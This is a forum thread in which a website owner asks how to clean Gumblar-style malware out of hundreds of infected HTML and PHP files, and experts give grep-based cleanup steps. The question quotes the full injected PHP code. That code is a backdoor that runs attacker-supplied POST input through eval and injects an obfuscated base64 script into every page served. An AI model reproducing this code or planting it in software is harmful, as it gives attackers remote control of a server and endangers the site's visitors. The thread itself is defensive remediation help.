remove document.write unescape References

Posted on 2009-05-20
Medium Priority
Last Modified: 2013-12-06
Do you have an application that will allow me to remove following type of viruses from my html/php files?


1) something to do with GUMBLAR code
2) How to remove document.write unescape References?

<script language=javascript><!--

3) FROM PHP FILES following junk coding... added to my codes

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0NzY3BHaHJwR2hpZzhMcHQlMjBnUGhzclQ4YyUzRCUyRiUyRm04OTRUOCUyRTJwR2g0NyUyRTIlMkVUODE5NWUycSUyRmpxdWdQaGVwR2hyVDh5ZzhMJTJFVDhqc3BHaCUzRVQ4JTNDJTJGek9Nc2NyaXBlMnF0ek9NJTNFJykucmVwbGFjZSgvZTJxfHpPTXxUOHxnUGh8ZzhMfG04fHBHaC9nLCIiKSk7CiAtLT48L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

If you have something to remove these type of viruses please let me know. I have over 200 main folders and many sub and sub folders under it which is infected by such. If I sit manually to remove this from all it will take me a very long time. Please advise. I have the files on a web server as well as on my local computer hard drive.

Thanks & Regards
Question by:shahja9
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
  • 8
  • 2
LVL 41

Expert Comment

ID: 24433066

If you have grep on your system, you could:

- Locate files containing "write(unescape", or  "function_exists('tmp",

- Then, you could use "grep -v" to process the file, and keep every line except those that contain the offending text...

grep -v "write\(unescape" myFile.html >myFile.new

The result of this should be the contents of "myFile.html" being copied to the output file (myFile.new) without the matching line
LVL 41

Expert Comment

ID: 24433079
If the offending text spans more than one line, we would have to do something a little more complicated.

Let me know.
LVL 41

Expert Comment

ID: 24433102
If you need grep for Windows, I found this one recently.  It has been around for awhile, but appears to be stable for all of the things for which I have used it.

Need protection from advanced malware attacks?

Look no further than WatchGuard's Total Security Suite, providing defense in depth against today's most headlining attacks like Petya 2.0 and WannaCry. Keep your organization out of the news with protection from known and unknown threats.

LVL 41

Expert Comment

ID: 24433129
The neat thing about grep is that you could use it to locate the files containing the offending text, and output this to a ".bat" or ".sh" file, then use a good editor to take this list of files and change the file name to be an invocation of grep to process the input file, and remove the offending text, then execute the modified script file.  

That's how I would do it.

Author Comment

ID: 24433315

Thanks for the prompt reply. I am sorry I am very new to this virus. Do I check this on the web server or on my local backup. I have taken the entire backup of the files that are on the web server on my hard disk. It is over 12 gig. Now please suggest me the best, easiest and quickest solution to get rid of the virus "junk" coding. I have never used grep...please help

LVL 41

Expert Comment

ID: 24433400
For example:

- Open a command prompt to the main directory/folder
- Use grep to find all the files containing the

  grep -SL "write\(unescape" *.html >grep.out

- Use a good editor (e.g., this worked in slickedit (VI mode) for me )

:%s/^(.*).html$/grep -v "write(unescape" \1.html >\1.out/

- Rename the file to have a suitable script extension (either .bat, or .sh)
- If you're on a Unix type system, make the script executable
- execute the script
- Check some of the *.out files

I would then consider building another script file to "rename" the *.out to *.html for each of the processed files
LVL 41

Expert Comment

ID: 24433502
Do you have grep?

To find out type the following at a command prompt:

grep -?

If you get some "help" type output, it is available.
If not, you are going to have to find/install one.

What operating system are you using?

I would certainly use grep to check to see if any of your backups files are infected
LVL 41

Expert Comment

ID: 24434146
If you don't have grep installed, do you have Python, or Perl?

Author Comment

ID: 24436005
i installed grep.
I found the files that are infected. Now how do I auto clean it... with a script.. please can someone provide me the script and instructions?
LVL 41

Accepted Solution

HonorGod earned 1000 total points
ID: 24436223
sure.  Does the grep that you have allow you to specify "-S" to search sub-directories?  How about "-L" to only list file names containing the matching string?

So, can you use something like:

grep -SL "write\(unescape" *.html >grep.out

to find all of the files infected with that particular sequence of characters?

Look in the grep.out that is created.  You should have 1 line for each infected file.

What editor do you have?

Edit grep.out, and:

insert the following at the beginning of every line:

grep -v "write\(unescape"

remember to have a space after the closing double-quote.
So, each line should look like:

grep -v "write\(unescape" fileName01.html
grep -v "write\(unescape" fileName02.html

Append " >" (without the quote) to the end of each line...

Does your editor allow you to select, and copy a column of characters?
Select all of the file name portions of each line (they should all start in the same column), and append the filename block to the end of the line.  This makes each line look like:

grep -v "write\(unescape" fileName01.html >fileName01.html
grep -v "write\(unescape" fileName02.html >fileName02.html

Then, change the last part of each line from .html to something else, e.g., .out
which makes the file look like:

grep -v "write\(unescape" fileName01.html >fileName01.out
grep -v "write\(unescape" fileName02.html >fileName02.out

I presume that you are using Windows.  Is that correct?

rename grep.out fix.bat

Then, you should be able to execute:


and see each grep command get executed.

By the way, since you have 1 line for each infected file, how many lines (infected files) do you have?
LVL 82

Assisted Solution

hielo earned 1000 total points
ID: 24708115

Featured Post

2017 Webroot Threat Report

MSPs: Get the facts you need to protect your clients.
The 2017 Webroot Threat Report provides a uniquely insightful global view into the analysis and discoveries made by the Webroot® Threat Intelligence Platform to provide insights on key trends and risks as seen by our users.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

If you thought ransomware was bad, think again! Doxware has the potential to be even more damaging.
This article demonstrates how to create a simple responsive confirmation dialog with Ok and Cancel buttons using HTML, CSS, jQuery and Promises
The viewer will learn the basics of jQuery including how to code hide show and toggles. Reference your jQuery libraries: (CODE) Include your new external js/jQuery file: (CODE) Write your first lines of code to setup your site for jQuery…
Email security requires an ever evolving service that stays up to date with counter-evolving threats. The Email Laundry perform Research and Development to ensure their email security service evolves faster than cyber criminals. We apply our Threat…

771 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question